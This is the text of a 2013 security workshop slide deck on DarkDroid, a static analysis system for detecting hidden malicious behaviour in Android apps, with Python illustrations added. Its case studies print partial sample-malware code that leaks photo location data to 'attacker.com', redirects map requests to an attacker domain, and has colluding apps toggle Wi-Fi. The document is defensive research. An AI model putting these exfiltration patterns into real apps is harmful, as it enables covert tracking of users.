Divining Intent - 8th Workshop on Embedded Systems Security ...

Dec 14, 2013
Divining Intent
Exposing Hidden Malicious Functionality on Android Devices
William Robertson
ACM ESWEEK/WESS
29 September 2013
Northeastern University
.
.
1/54
.
Divining Intent
.

Mobile Devices

Android

79% of all phones sold in 2Q13 were Android devices
[Gartner, August 2013]

Android app revenue increased to more than half of iOS
[Distimo, August 2013]

Android devices are used in increasingly critical roles

Android Security

Google used the opportunity to improve on legacy
platform security

UNIX security model, plus:

Managed runtime

Code signing

Permissions system

Android Permissions

Mobile Malware

Data exfiltration

Authentication credentials

Economic attacks

Premium SMS

Virtual currency

Attacks on user privacy

Detection Approaches

Power analysis

Program analysis

Static vs. dynamic

On-device vs. market-based

Tradeoffs in precision and impact on UX

Outline

Introduction

DarkDroid

Challenges

Modeling Malware

Implicit Flows

Inter-App Flows

Triggers

Case Studies

Conclusion

DarkDroid

DarkDroid
Goals

Screen apps submitted to centralized app markets

Flag potentially malicious apps for review

Automatically remediate malicious apps

Harden vulnerable apps against compromise

Address next-generation malware

DarkDroid
Precise, scalable static analysis

Cannot ignore difficult cases (unlike bug finding)

Analysis directly on bytecode

Minimal a priori assumptions regarding app design

Cannot consider apps in isolation

DarkDroid
Model malicious behavior

Capture a wide spectrum of attacks from realistic
malware

Avoid false positives inherent in positive modeling

Automated instrumentation

Broadens available responses

Wholesale blocking of apps from markets

Removal of malicious functionality

Automated protection against new attacks

Static Analysis
Tracking data flows

Abstract interpretation over all possible program inputs

Flow-sensitive

Path-sensitive

Context-sensitive

Identifies flows from data sources to sinks that
potentially represent attacks

Static Analysis
Flow-sensitive
Analysis respects statement ordering.
public int f() {
    int x = 1;
    ...
    x = -1;
    ...
    return x;
}

Static Analysis
Path-sensitive
Analysis annotates values with path constraints.
public int f(int x) {
    if (x < 0)
        return -x;
    return x;
}

Static Analysis
Context-sensitive
Analysis propagates facts across method
invocations and distinguishes between call-sites.
public int f() {
    int x = g(1);
    x = g(-1);
    return x;
}

public int g(int x) {
    return -x;
}
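A toy taint analysis, added here as an illustration rather than DarkDroid's code, showing what flow- and context-sensitivity buy when tracking flows from sources to sinks: statements are visited in order so an overwrite kills a taint, and a callee is re-analyzed per call site so a clean and a tainted argument are kept apart. The IR, the tags and the program are constructed for the example.

```python
# Toy IR (constructed): ("const", dst) ("source", dst, tag) ("copy", dst, src)
#                       ("call", dst, fn, [args]) ("sink", src, tag) ("ret", src)

def analyze(fn, program, arg_taints, reports, ctx=()):
    """env maps a variable to the source tags that may reach it. Statements run
    in order and an assignment replaces the old set (flow-sensitive); each call
    re-analyzes the callee with that site's argument taints (context-sensitive).
    Returns the taint set of the return value."""
    params, body = program[fn]
    env = dict(zip(params, arg_taints))
    for stmt in body:
        op = stmt[0]
        if op == "const":                  # strong update kills prior taint
            env[stmt[1]] = set()
        elif op == "source":
            env[stmt[1]] = {stmt[2]}
        elif op == "copy":
            env[stmt[1]] = set(env.get(stmt[2], set()))
        elif op == "call":                 # no recursion guard: toy only
            _, dst, callee, args = stmt
            taints = [set(env.get(a, set())) for a in args]
            env[dst] = analyze(callee, program, taints, reports, ctx + (fn,))
        elif op == "sink":
            reaching = env.get(stmt[1], set())
            if reaching:                   # a tainted value reaches a sink
                reports.append((sorted(reaching), stmt[2], ctx + (fn,)))
        elif op == "ret":
            return set(env.get(stmt[1], set()))
    return set()

# Constructed program in the shape of Sample A: location data passes through a
# helper into a network sink, then the variable is overwritten before a second sink.
PROGRAM = {
    "wrap": (["v"], [("copy", "r", "v"), ("ret", "r")]),
    "main": ([], [
        ("source", "loc", "#location"),
        ("call", "a", "wrap", ["loc"]),   # tainted argument -> tainted result
        ("const", "c"),
        ("call", "b", "wrap", ["c"]),     # same callee, clean argument
        ("sink", "b", "#network"),        # not reported: contexts kept apart
        ("sink", "a", "#network"),        # reported: #location -> #network
        ("const", "a"),                   # overwrite kills the taint
        ("sink", "a", "#network"),        # not reported: ordering respected
    ]),
}

def run(program=PROGRAM):
    reports = []
    analyze("main", program, [], reports)
    return reports
```

A flow-insensitive or context-insensitive variant would report all three sinks; the single report is the precision the slides ask for.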

Static Analysis
Tracking data flows

Handle not only data flows, but also values

Permissions are too coarse-grained

String, value range analysis

Static Analysis
Tracking data flows

Handle complex data structures

Standard collection classes

Key-value stores for intent parameters

Static Analysis
Tracking data flows

Handle user interaction, activities, and intents

Otherwise, data flows can be broken

Static Analysis
Tracking data flows

Whole system analysis

Model interactions between apps

Harden apps given known device configurations

System Overview

Modeling Malware

Important step is to create a solid threat model

Sources for malicious code examples

Contagio malware dump

Android Malware Genome project

Government red teams

Andrubis

Translate threat model into properties that static
analysis can check

Andrubis

Dynamic analysis platform for Android apps

Leverages Anubis malware analysis infrastructure

Runs uploaded apps in emulated environment

Produces concise reports of observed suspicious
behaviors

Currently processes thousands of apps/day

Modeling Malware

Flows defined in terms of sources and sinks

Source classes

Filesystem, network, SMS, bluetooth, GPS, microphone,
camera, UI, etc.

Sink classes

Filesystem, network, SMS, log, UI, etc.

Modeling Language

#storage
<=FileInputStream <=Context:openFileInput(<=String path) {
    label(return, path);
}

#network
<=URLConnection <=URL:openConnection() {
    label(return, this);
    output(this);
}

App Structure

Android apps written as collections of event-driven or
asynchronous components

Activity, Service, BroadcastReceiver

AsyncTask, Thread, Runnable, Callable

requestLocationUpdates → onLocationChanged

Invocations between components occur through intents

Abstract action vs. explicit target

Data parameters in Bundles

App Lifecycle

Apps have well-defined lifecycle

Manifests as ordered sequence of callbacks from runtime

e.g., onCreate → onStart → … → onStop → onDestroy

Failing to model this is equivalent to flow insensitivity in
the large

Implicit Flows

Analysis platform must handle implicit flows through
framework

Otherwise, malicious flows can be lost!

Including framework code in analysis is infeasible

Explicit registrations are straightforward

takePicture → onPictureTaken

Many methods are called implicitly and require
specification

Recovering these manually is tedious and error-prone

The Clicker

We use dynamic analysis to identify previously
unknown implicit flows

Increases coverage, preserves precision of static analysis

Combination of instrumentation and the Clicker

UI interactions driven by the Clicker

Record exit points from apps, entry points into runtime

Trace events binned by thread

The Clicker

Driving Android apps in a realistic way is important

Existing tools (Monkey, MonkeyRunner)

Monkey randomly generates click events

MonkeyRunner requires manual specification

Clicker automatically extracts the current context of
Dalvik bytecode

Generates likely UI events given current screen contents

Implicit Flows

<=AsyncTask(Object[] args) {
    @init { void onPreExecute(); }
    @run {
        Object doInBackground(Object[] args);
        void onProgressUpdate(Object[] args);
    }
    @fini {
        void onCancelled(Object obj);
        void onPostExecute();
    }
    @reg {
        AsyncTask execute(Object[] args) {
            <=AsyncTask(this=this, args=args);
        }
    }
}
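As an added example (not DarkDroid's implementation), the kind of call-graph completion a specification like the one above enables, covering both the app-lifecycle and the implicit-flow slides: a constructed model table maps registration methods to the callbacks the framework will run, and a constructed app in the shape of Sample B shows that the network request inside doInBackground is only reachable from onCreate once the implicit edges are added.

```python
# Registration method -> callbacks the framework invokes afterwards, in phase order.
# Constructed model for this illustration, in the spirit of the AsyncTask spec above.
MODEL = {
    "AsyncTask.execute": ["onPreExecute", "doInBackground",
                          "onProgressUpdate", "onPostExecute"],
    "Camera.takePicture": ["onPictureTaken"],
    "LocationManager.requestLocationUpdates": ["onLocationChanged"],
}

def add_implicit_edges(calls, model=MODEL):
    """calls: {caller: [callees]} recovered from the app's own bytecode, i.e.
    explicit edges only. Returns a graph that also contains the edges the
    framework will take: the registration site reaches the first callback and
    each callback reaches the next phase (an ordering approximation)."""
    graph = {k: list(v) for k, v in calls.items()}
    for caller, callees in calls.items():
        for callee in callees:
            if callee in model:
                chain = model[callee]
                graph.setdefault(caller, []).append(chain[0])
                for a, b in zip(chain, chain[1:]):
                    graph.setdefault(a, []).append(b)
    return graph

def reachable(graph, start):
    """Plain depth-first reachability over the call graph."""
    seen, work = set(), [start]
    while work:
        node = work.pop()
        if node not in seen:
            seen.add(node)
            work.extend(graph.get(node, []))
    return seen

# Constructed app in the shape of Sample B: the HTTP request sits in the
# AsyncTask's doInBackground, which nothing in the app calls directly.
APP_CALLS = {
    "onCreate": ["AsyncTask.execute"],
    "doInBackground": ["HttpClient.execute"],
}

def sink_reachable(with_model):
    """Is the network sink reachable from onCreate, with or without the model?"""
    graph = add_implicit_edges(APP_CALLS) if with_model else APP_CALLS
    return "HttpClient.execute" in reachable(graph, "onCreate")
```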

String Analysis

Resolving implicit flows often requires string analysis

Also useful for resolving reflection targets, URLs, FS paths,
etc.

Platform uses Z3-STR [Zheng13]

Constraints recorded during static analysis, dumped to Z3 as
necessary

append, substring, reverse, charAt, delete, …

Results incorporated into subsequent analysis

String Analysis

An important application of string analysis is intent
resolution

Intents used to pass messages between app
components

Intent actions are strings!

android.intent.action.VIEW,
android.intent.action.SEND, …

If actions cannot be resolved, a conservative analysis
must explore all possible target components

Increased analysis runtime, decreased precision
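Added illustration, not the platform's own code: a set-based abstract string domain with a TOP value standing in for a string the analysis could not bound, fed into intent resolution against constructed manifest facts. Component names and intent filters are assumed; the SampleB names follow the Sample C case study later in the deck.

```python
from dataclasses import dataclass, field

TOP = None   # marker: the string analysis could not bound the value

def concat(a, b):
    """Abstract string append over finite sets of candidates; TOP absorbs."""
    if a is TOP or b is TOP:
        return TOP
    return {x + y for x in a for y in b}

@dataclass
class Component:
    name: str
    exported: bool
    actions: set = field(default_factory=set)   # <action> names in its <intent-filter>

# Constructed manifest facts for the illustration (not a real manifest dump).
COMPONENTS = [
    Component("viewer/.ViewActivity", True, {"android.intent.action.VIEW"}),
    Component("share/.SendActivity", True, {"android.intent.action.SEND"}),
    Component("SampleB/.Receiver", True, {"SampleB.RECEIVE"}),
    Component("SampleB/.Internal", False, set()),
]

def resolve_targets(actions, components):
    """Components an implicit intent may reach, given the set of action strings
    the analysis derived. An unresolved action (TOP) forces the conservative
    answer: every exported component is a potential target."""
    exported = [c for c in components if c.exported]
    if actions is TOP:
        return {c.name for c in exported}
    return {c.name for c in exported if c.actions & actions}

def demo():
    """Three cases: fully resolved, a small candidate set, and unresolved."""
    resolved = concat({"SampleB."}, {"RECEIVE"})
    candidates = concat({"android.intent.action."}, {"VIEW", "SEND"})
    unresolved = concat({"android.intent.action."}, TOP)   # suffix unknown
    return (resolve_targets(resolved, COMPONENTS),
            resolve_targets(candidates, COMPONENTS),
            resolve_targets(unresolved, COMPONENTS))
```

The third case is the precision loss the slide describes: every exported component becomes a candidate target and must be explored.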

Inter-App Flows

Prior work has shown that permission re-delegation is
an important class of attack on Android

Implies that apps should not only be considered in isolation

Multi-app analysis allows us to derive security policies
for collections of apps

Analysis first performed for individual apps

Constraints propagated along possible inter-app flows

Inter-App Flows (five figure-only slides; the diagrams are not recoverable from the text)

Performance
2K apps from the Google Play store. 96% of dynamic edges covered.

Sample A

App to display pictures loaded from the Internet

When a particular picture is selected, time and location
data is extracted from all pictures on SD card

When a particular button is pressed, extracted data is
leaked to the attacker

Sample A
public void nextButton(View view) {
    ...
    if (curIdx == 2) {
        curIdx++;
        x = getImages();
    }
}

public String getImages() {
    File pics = new File(sd, "DCIM/Camera");
    ...
    data += (ExifInterface) e.getLatLong(item);
    ...
    return data;
}

public void aboutButton(View view) {
    String host = "attacker.com";
    String url = host + "?" + x;
    startActivity(new Intent(Intent.ACTION_VIEW, Uri.parse(url)));
}

Sample A
"inputs":[{
    "tags":["#location"],
    "target_method":"ExifInterface.getLatLong(float[]):boolean"
}],
"outputs":[{
    "tags":["#network","#intent"],
    "target_method":"SampleA.startActivity(android.content.Intent):void"
}]

Sample B

Mapping app that provides directions between
arbitrary points selected by the user

When a button is clicked,an intent containing the
location data is generated to invoke the Google Maps
API

This intent data is then modified to leak the location
data to the attacker

Sample B
String url = "http://maps.google.com/maps?saddr=" + params;
Intent intent = new Intent(android.content.Intent.ACTION_VIEW, Uri.parse(url));
startActivity(intent);
URI uri = new URI(update(url));
new Updater().execute(uri);

// Transform the legitimate URL to a URL pointing to maps.attacker.com
private String update(String x) {...}

// Send an HTTP GET request to the malicious domain on another thread
private class Updater extends AsyncTask<URI, Void, Void> {
    protected Void doInBackground(URI... uris) {...}
}

Sample B
"inputs":[{
    "target_method":"GeoPoint:getLongitudeE6()",
    "tags":["#location"]
}],
"outputs":[{
    "target_method":"Uri:parse(String uri)",
    "data":"http://maps.google.com/maps?saddr=.*,.*&daddr=.*,.*",
    "tags":["#network"]
},{
    "target_method":"void Context:startActivity(Intent intent)",
    "data":"action=android.intent.action.VIEW",
    "tags":["#intent"]
}]

Sample B
"inputs":[{
    "target_method":"GeoPoint:getLongitudeE6()",
    "tags":["#location"]
}],
"outputs":[{
    "target_method":"Uri:parse(String uri)",
    "data":"http://maps.attacker.com/maps?saddr=.*,.*&daddr=.*,.*",
    "tags":["#network"]
},{
    "call_site":"SampleB$Updater.doInBackground(URI[]):Void",
    "target_method":"HttpClient:execute(HttpUriRequest req)",
    "tags":["#network"]
}]

Sample C

App to remotely administrate device features

Turn on/off wireless, bluetooth, etc.

Malicious behavior implemented in another app!

Intents sent to colluding app under particular conditions

Requires handling inter-app flows, string analysis

Sample C
public static final int SECRET_MSG = 123456;

private ServiceConnection conn = new ServiceConnection() {
    public void onServiceConnected(...) {
        bundle.putBoolean("data", false);
        Message msg = Message.obtain(null, SECRET_MSG, 0, 0);
        msg.setData(bundle);
    }
};

action = "SampleB.RECEIVE";
bindService(new Intent(action), conn, Context.BIND_AUTO_CREATE);

<service android:name="SampleB.Receiver">
    <intent-filter>
        <action android:name="SampleB.RECEIVE"/>
    </intent-filter>
</service>

Sample C
public void handleMessage(Message msg) {
    switch (msg.what) {
        case TAG: // TAG = 123456
            try {
                Context ctxt = createPackageContext("nonexistent", ...);
            } catch (NameNotFoundException e) {
                Bundle data = msg.getData();
                final Boolean x = data.getBoolean("data");
                setWifiEnabled(getApplicationContext(), x);
            }
    }
}

Sample C
"inputs":[{
    "data":"action=SampleB.RECEIVE",
    "tags":["#static"]
},{
    "call_site_method":"SampleB.ActivityA$1.onServiceConnected(...):void",
    "target_method":"void Message:setData(Bundle data)",
    "data":"data=false"
}],
"outputs":[{
    "target_method":"bindService(Intent,...):boolean",
    "tags":["#intent"]
}]

Sample C
"inputs":[{
    "tags":["#intent"],
    "target_method":"Message.getData():Bundle",
    "data":"data=false"
}],
"outputs":[{
    "tags":["#wifi"],
    "target_method":"WifiManager.setWifiEnabled(boolean):boolean"
}]
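As an added example (not DarkDroid output or code), a market-side policy check over reports in the shape shown for Samples A, B and C: constructed copies of the Sample A and Sample C reports are joined on the intent action to expose the cross-app flow, and a small assumed policy flags location exfiltration and device settings driven from another app. The action string on the receiving side of Sample C is added here so the join is visible; the real report only shows the bundle data.

```python
import json
from collections import namedtuple

Flow = namedtuple("Flow", "src sink app via")   # via: sending app for inter-app flows

# Constructed reports in the slides' JSON shape, completed into whole objects. The
# action on the receiving side of Sample C is assumed here so that the join is visible.
REPORTS = [json.loads(s) for s in (
    '{"app":"SampleA","inputs":[{"tags":["#location"],"target_method":"ExifInterface.getLatLong(float[]):boolean"}],'
    '"outputs":[{"tags":["#network","#intent"],"target_method":"SampleA.startActivity(android.content.Intent):void"}]}',
    '{"app":"SampleC","inputs":[{"tags":["#static"],"data":"action=SampleB.RECEIVE"}],'
    '"outputs":[{"tags":["#intent"],"data":"action=SampleB.RECEIVE","target_method":"bindService(Intent,...):boolean"}]}',
    '{"app":"SampleB","inputs":[{"tags":["#intent"],"data":"action=SampleB.RECEIVE","target_method":"Message.getData():Bundle"}],'
    '"outputs":[{"tags":["#wifi"],"target_method":"WifiManager.setWifiEnabled(boolean):boolean"}]}',
)]

def action_of(entry):
    """Intent action recorded in an entry's data field, or None."""
    data = entry.get("data", "")
    return data.split("action=", 1)[1] if "action=" in data else None

def direct_flows(report):
    """Every (source tag, sink tag) pair the report connects inside one app."""
    return [Flow(s, k, report["app"], None) for i in report["inputs"] for s in i["tags"]
            for o in report["outputs"] for k in o["tags"]]

def inter_app_flows(reports):
    """Join one app's #intent output to another app's #intent input on the action string."""
    flows = []
    for sender in reports:
        for out in (o for o in sender["outputs"] if "#intent" in o["tags"] and action_of(o)):
            for receiver in (r for r in reports if r is not sender):
                for inp in receiver["inputs"]:
                    if "#intent" in inp["tags"] and action_of(inp) == action_of(out):
                        srcs = {s for e in sender["inputs"] for s in e["tags"]}
                        sinks = {k for e in receiver["outputs"] for k in e["tags"]}
                        flows += [Flow(s, k, receiver["app"], sender["app"])
                                  for s in srcs for k in sinks]
    return flows

def violations(reports=REPORTS):
    """Flows a market-side policy would flag for review (policy is assumed)."""
    found = []
    for f in [f for r in reports for f in direct_flows(r)] + inter_app_flows(reports):
        if f.src == "#location" and f.sink in {"#network", "#sms"}:
            found.append(("location exfiltration", f))
        if f.sink in {"#wifi", "#bluetooth"} and f.via is not None:
            found.append(("device setting driven by another app", f))
    return found
```

Without the join step, Sample C's receiver looks like an ordinary settings app and its sender like an app that merely binds a service; only the combined flow is suspicious.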

Conclusions

Android devices are a platform increasingly targeted
by attackers

Many interesting challenges

App lifecycle

Inter-app communication

Defensive techniques must evolve to keep pace with
rapid evolution of attacks

Thank You!
http://seclab.ccs.neu.edu/
http://wkr.name/